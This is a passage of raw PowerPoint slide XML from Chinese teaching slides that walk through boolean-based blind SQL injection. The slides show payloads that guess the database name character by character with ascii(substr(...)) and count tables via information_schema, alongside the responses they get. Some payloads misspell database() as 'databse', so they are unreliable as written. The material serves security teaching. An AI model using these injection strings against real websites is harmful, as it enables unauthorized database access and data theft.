                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>ascii</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>值小于</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>103</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>（小写字母</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>g</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>的</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>ascii</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>值）；</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr indent="266700" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="125000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>输入</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>1' and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>ascii</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>substr</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>databse</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>(),1,1))&lt;100 #</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>，显示不存在，说明数据库名的第一个字符的</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>ascii</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>值不小于</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>100</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>（小写字母</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>d</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>的</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>ascii</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>值）；</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr indent="266700" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="125000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>输入</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>1' and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>ascii</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>substr</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>databse</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>(),1,1))&gt;100 #</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>，显示不存在，说明数据库名的第一个字符的</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>ascii</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>值不大于</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>100</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>（小写字母</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>d</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>的</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>ascii</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>值），所以数据库名的第一个字符的</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>ascii</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>值为</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>100</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>，即小写字母</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>d</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>。</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr indent="266700" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="125000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="2000" b="0" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>…</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="20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3448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32222B4-D638-466B-A071-8D53D47E4E22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028775" y="1168053"/>
            <a:ext cx="11161240" cy="4247317"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>第三步：猜解数据库中的表名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="100" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="100" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>首先猜解数据库中表的数量：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>1' and (select count (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>=database())=1 # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>显示不存在</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>1' and (select count (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>=database() )=2 # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>显示存在</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>说明数据库中共有两个表。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1794383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32222B4-D638-466B-A071-8D53D47E4E22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028775" y="952029"/>
